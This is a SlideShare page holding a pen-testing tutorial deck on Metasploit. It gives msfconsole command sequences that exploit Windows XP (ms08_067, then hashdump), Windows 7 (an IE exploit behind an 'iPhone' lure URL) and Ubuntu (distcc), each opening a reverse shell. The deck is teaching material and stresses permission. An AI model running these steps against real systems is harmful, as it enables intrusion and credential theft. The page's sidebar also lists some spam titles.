SlideShare a Scribd company logo

Pen-Testing with Metasploit

Mohammed Danish Amber
Mohammed Danish Amber

Penetration testing using Metasploit. Windows Xp Windows 7 Linux Server

Software
1 of 29
Download to read offline
Pen-Testing With MetasploitBy -Mohammed Danish Amber
AGENDA ▪ Why & What's Pen-Testing ▪ About Metasploit ▪ Metasploit Basic & Meterpreter ▪ Demo
Mohammed Danish Amber ▪ Geek & Security Analyst ▪ Information Security Enthusiast ▪ Working in TCS ▪ Lecturer & Engineer ▪ Collaborative Project -Hacker Ecosystem ▪ Make Internet a Secure Place
Why Pen-Testing ▪ Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches ▪ Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs
What's Pen-Testing ▪ A method to evaluate the security of computer system / network ▪ Practice ( attacking ) an IT System like a ‘hacker’ does– Find security holes (weaknesses) – Bypass security mechanism– Compromise an organization’s IT system securityMUST HAVE PERMISSION FROM IT SYSTEM OWNERILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
ETHICS ▪ THINK BEFORE YOU ACT ▪ DON'T BE STUPID ▪ DON'T BE MALICIOUS
PEN-TESTING PHASES INFORMATION GATHERING VULNERABILITY ANALYSIS EXPLOITATION POST EXPLOITATION REPORTING
Metasploit ▪ Not Just A Tool but an entire framework ▪ An Open Source platform for writing security tools and exploits ▪ Easily build attack vectors to add it's exploits, payloads, encoders. ▪ Create and execute more advanced attack ▪ Ruby based
Metsaploit Interface ▪ MSFconsole ▪ msfweb, msfgui (discontinued) ▪ Metasploit Pro & Community Edition ▪ Armitage
MSFconsole
MSFcli
Metasploit Terminology ▪ Exploit: Code that allow a pentester take some advantages of flaw within system,application, or service ▪ Payload: Code that we want the target system to execute (few commands to be executed on the target system) ▪ Shellcode: A set of instructions used as payload when exploitation occurs ▪ Module: A software that can be use by metasploit ▪ Listener: A component waiting for incoming connection
How does Exploitation works Attacker Sends: Exploit + PayloadUpload + download DATA Vulnerable Server Exploit run + Payload run
Meterpreter ▪ As a payload after vulnerability is exploited ▪ Improve the post exploitation
Meterpreter Exploiting a vulnerability Select a meterpreter as a payload Meterpreter shell
Metereperter Commands
Metereperter Commands
Metereperter Commands
Metereperter Commands
Metereperter Commands
Windows XP Exploitation ▪ msf > search windows/smb ▪ msf > info exploit/windows/smb/ms08_067_ netapi ▪ msf > use exploit/windows/smb/ms08_067_ netapi ▪ msf exploit(ms08_067_netapi) > show payloads ▪ msf exploit(ms08_067_netapi) > set PAYLOAD ▪ windows/meterpreter/reverse_tcp ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip> ▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip> ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > exploit ▪ meterpreter > background ▪ session -l
Windows XP Exploitation ▪ session -i 1 ▪ meterpreter > getsystem -h ▪ getuid ▪ hashdump
Windows 7 Exploitation ▪ msf > use exploit/windows/browser/ms11_003_ie_css_import ▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms11_003_ie_css_import) > show options ▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <victim ip> ▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 ▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe ▪ msf exploit(ms11_003_ie_css_import) > set LHOST <victim ip> ▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443 ▪ msf exploit(ms11_003_ie_css_import) > exploitJust wait until the victim open url http://<ip>:80/free_iphon6plus.exe
Windows 7 Exploitation ▪ msf exploit(ms11_003_ie_css_import) > sessions -l ▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1 ▪ meterpreter > sysinfo ▪ meterpreter > shell
Ubuntu Exploitation ▪ search distcc ▪ use exploit/unix/misc/distcc_exec ▪ show payloads ▪ set PAYLOAD cmd/unix/reverse ▪ show options ▪ set rhost <victim ip> ▪ set lhost <attacker ip>
Any Questions?
Thanks To ▪ Kali / BackTrack Linux ▪ Metasploit Team (HD Moore & rapid7) ▪ Offensive Security / Metasploit Unleashed ▪ David Kennedy ▪ Georgia Weidman ▪ Null Hyderabad Chapter -CORE TEAM ▪ #nullhyd @
WWW.MOHAMMEDDANISHAMBER.COM

Recommended

Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Metasploit
MetasploitMetasploit
MetasploitLalith Sai
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 

Recommended

Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Metasploit
MetasploitMetasploit
MetasploitLalith Sai
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 
Nessus-Vulnerability Tester
Nessus-Vulnerability TesterNessus-Vulnerability Tester
Nessus-Vulnerability TesterAditya Jain
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodologyRashad Aliyev
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploitAashish R
 
Metaploit
MetaploitMetaploit
MetaploitAjinkya Pathak
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
Demo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerDemo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerAjit Dadresa
 
Burp suite
Burp suiteBurp suite
Burp suiteSOURABH DESHMUKH
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Snort
SnortSnort
SnortStickman Hai
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat ModelingRochester Security Summit
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisSam Bowne
 
Security Testing
Security TestingSecurity Testing
Security TestingKiran Kumar
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresMarco Morana
 
Metasploit
MetasploitMetasploit
MetasploitRaghunath G
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic MetasploitMuhammad Ridwan
 

More Related Content

What's hot

Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 
Nessus-Vulnerability Tester
Nessus-Vulnerability TesterNessus-Vulnerability Tester
Nessus-Vulnerability TesterAditya Jain
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodologyRashad Aliyev
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploitAashish R
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
Demo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerDemo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerAjit Dadresa
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisSam Bowne
 
Security Testing
Security TestingSecurity Testing
Security TestingKiran Kumar
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresMarco Morana
 

What's hot (20)

Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Metasploit
MetasploitMetasploit
Metasploit
 
Nessus-Vulnerability Tester
Nessus-Vulnerability TesterNessus-Vulnerability Tester
Nessus-Vulnerability Tester
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
 
Metaploit
MetaploitMetaploit
Metaploit
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Demo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerDemo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scanner
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Snort
SnortSnort
Snort
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
 
Security Testing
Security TestingSecurity Testing
Security Testing
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Encoded Attacks And Countermeasures
Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And Countermeasures
 

Viewers also liked

44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON
 
Denial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksDenial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksJens Oberender
 
Meterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideMeterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideKhairi Aiman
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON
 
La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tpinkflawd
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkTom Eston
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using MeterpreterShubham Mittal
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactTom Eston
 
The complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospiceThe complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospicedrucsamal
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms) Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms) Pham Viet Dung
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingPhilip Young
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploitchungdv
 

Viewers also liked (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves
 
Denial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksDenial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity Networks
 
Meterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideMeterpreter in Metasploit User Guide
Meterpreter in Metasploit User Guide
 
Ips and-ids
Ips and-idsIps and-ids
Ips and-ids
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
 
Messing around avs
Messing around avsMessing around avs
Messing around avs
 
La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren't
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using Meterpreter
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
 
The complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospiceThe complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospice
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms) Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe Hacking
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
 

Similar to Pen-Testing with Metasploit

Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingRaghav Bisht
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemBikrant Gautam
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing toolmedoelkang600
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기Ji-Woong Choi
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014Bryce Kunz
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposPriyanka Aash
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsRod Soto
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
Common NonStop security hacks and how to avoid them
Common NonStop security hacks and how to avoid themCommon NonStop security hacks and how to avoid them
Common NonStop security hacks and how to avoid themGreg Swedosh
 

Similar to Pen-Testing with Metasploit (20)

iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Real life hacking101
Real life hacking101Real life hacking101
Real life hacking101
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 
Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Common NonStop security hacks and how to avoid them
Common NonStop security hacks and how to avoid themCommon NonStop security hacks and how to avoid them
Common NonStop security hacks and how to avoid them
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 

Recently uploaded

W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnAmarnathKambale
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...masabamasaba
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...masabamasaba
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesVictorSzoltysek
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrandmasabamasaba
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...masabamasaba
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionOnePlan Solutions
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park masabamasaba
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyviewmasabamasaba
 
Architecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastArchitecture decision records - How not to get lost in the past
Architecture decision records - How not to get lost in the pastPapp Krisztián
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...SelfMade bd
 

Recently uploaded (20)

W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
